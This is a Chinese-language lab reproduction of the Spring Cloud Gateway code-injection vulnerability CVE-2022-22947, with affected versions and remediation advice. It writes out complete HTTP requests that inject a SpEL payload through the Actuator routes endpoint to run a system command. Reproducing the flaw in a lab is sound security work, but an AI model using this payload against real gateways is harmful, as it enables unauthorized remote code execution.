1.漏洞介绍
当Spring Cloud Gateway启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。
2.漏洞复现
2.1更新vulhub,切换到vulhub的目录git pull 拉取vulhub进行更新
2.2 进入cve-2022-22947,启动容器
2.3 访问漏洞环境
2.4 burp抓包,添加包含恶意的路由
POST /actuator/gateway/routes/EchoSec HTTP/1.1
Host: 192.168.42.145:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 334
{
"id": "EchoSec",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value":"#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
创建成功
2.5 刷新网关路由
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.42.145:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 334
{
"id": "EchoSec",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
刷新成功
命令执行成功
3.影响范围
受影响版本
-
Spring Cloud Gateway < 3.1.1
-
Spring Cloud Gateway < 3.0.7
-
Spring Cloud Gateway 旧的、不受支持的版本也会受到影响
安全版本
-
Spring Cloud Gateway >= 3.1.1
-
Spring Cloud Gateway >= 3.0.7
4.修复建议
目前, Spring Cloud 官方已发布安全更新,请及时下载安全版本进行升级和采取以下措施进行防护:
-
如果不需要Actuator端点,可以通过
management.endpoint.gateway.enable:false
配置将其禁用; -
如果需要Actuator端点,则应使用Spring Security对其进行保护。
下载地址:
https://github.com/spring-cloud/spring-cloud-gateway
参考链接:
https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published